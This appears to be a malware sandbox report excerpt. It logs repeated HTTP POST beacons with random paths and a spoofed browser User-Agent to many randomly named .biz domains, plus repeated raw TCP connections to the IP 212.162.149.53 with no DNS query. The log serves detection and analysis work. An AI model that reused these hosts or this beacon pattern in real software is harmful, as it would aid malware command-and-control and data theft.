Source: global traffic	HTTP traffic detected: POST /llqwfg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /ktqlpojqyvkm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /lmmwofqbgibg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dwrqljrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /unbrcr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dfhareuduqlkw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /dfkoxo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mag HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nqwjmb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /vwiainnwhhxhmrl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qxusu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /jnsspbhiayv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ytctnunms.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /mwjcsncppbbsr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /olxjktqd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /tcqjjounlnobfq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: myups.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /lix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /pfqnedtf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /xobu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: oshhkdluh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /ccaldaoawyay HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qsp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /ccrsdbhein HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /vmln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yunalwv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /ngqgkogciouo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /mud HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /bylbanfgrbak HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jpskm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /rginqqoeriix HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /firf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /fkolun HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gxaexbrilqhff HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: lrxdmhrr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rmqv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /jrt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /tkikmchfy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qujmm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wllvnzb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /rcghpbxpojjll HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /rw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /kx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /aopjncgsm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gnqgo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /lkksdoxsvitr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /rkvg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /qsmoxnmhx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jhvzpcfg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /wgsqpusbi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /dpkfjsv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /rtsxpsr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: acwjcqqv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /sywsqcciw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /gksshbghniig HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /skudpvsbobr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /flkllmp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vyome.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /skmiedduquder HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /gs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hjhd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: yauexmxk.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /qmr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /wlirwlunhdx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /fapfitlarmcnk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: iuzpxe.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /m HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: typgfhb.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hpebeygkilgsi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /hbbreaeoihjkosw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: esuzf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /d HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sxmiywsfv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /qsxryrm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vrrazpdh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /dw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /hph HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /unx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: gvijgjwkh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /xurncvjdsxxnivfe HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global traffic	HTTP traffic detected: POST /ptyighahceku HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ftxlah.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 826
Source: global traffic	HTTP traffic detected: POST /kfucjjkorih HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qpnczch.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778

Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
Source: unknown	TCP traffic detected without corresponding DNS query: 212.162.149.53
